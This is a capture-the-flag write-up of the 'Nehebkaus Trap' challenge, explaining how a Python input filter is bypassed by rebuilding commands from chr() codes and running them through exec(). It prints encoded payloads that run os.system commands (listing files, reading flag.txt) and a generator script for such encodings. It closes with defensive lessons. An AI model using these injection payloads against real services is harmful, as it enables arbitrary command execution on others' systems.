2023 Cyber Apocalypse: Nehebkaus Trap

#htb #ctf #misc #python #code-injection #bypass

Challenge Information

AttributeDetails
Event2023 Cyber Apocalypse
CategoryMisc
ChallengeNehebkaus Trap

Summary

This challenge involves a Python web application that filters certain characters in input but allows the exec() function. By converting characters to their ASCII representations using chr(), we can bypass the character filter and execute arbitrary commands.

Analysis

The vulnerable application accepts Python expressions but filters certain keywords and characters to prevent direct command execution. However, the filtering is incomplete and can be bypassed using character encoding.

Vulnerability: While direct strings like __import__('os').system('ls') are filtered, the same command can be reconstructed using chr() to build the string from ASCII codes.

Filter bypass techniques:

  1. Character encoding with chr():

    __import__('os').system('ls')
    # Becomes:
    chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(108)+chr(115)+chr(39)+chr(41)

  2. Using exec() to execute the reconstructed command:

    exec(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(108)+chr(115)+chr(39)+chr(41))

Solution

The exploitation process:

  1. Identify the filtering mechanism - determine which characters/keywords are blocked

  2. Convert command to ASCII codes:

    command = "__import__('os').system('cat flag.txt')"
    ascii_codes = [str(ord(c)) for c in command]
    encoded = '+'.join([f"chr({code})" for code in ascii_codes])

  3. Wrap with exec() and submit:

    final_payload = f"exec({encoded})"

  4. For verification, test with time.sleep():

    exec(chr(116)+chr(105)+chr(109)+chr(101)+chr(46)+chr(115)+chr(108)+chr(101)+chr(101)+chr(112)+chr(40)+chr(53)+chr(41))

Key Takeaways

  • Character filtering is insufficient for security
  • Character encoding techniques can bypass simple filters
  • The chr() function and its inverse ord() are essential for string manipulation
  • exec() and eval() are dangerous functions that should be avoided
  • Never trust user input, even if filtered
  • Multiple layers of filtering may still be bypassable
  • Proper input validation requires whitelisting, not blacklisting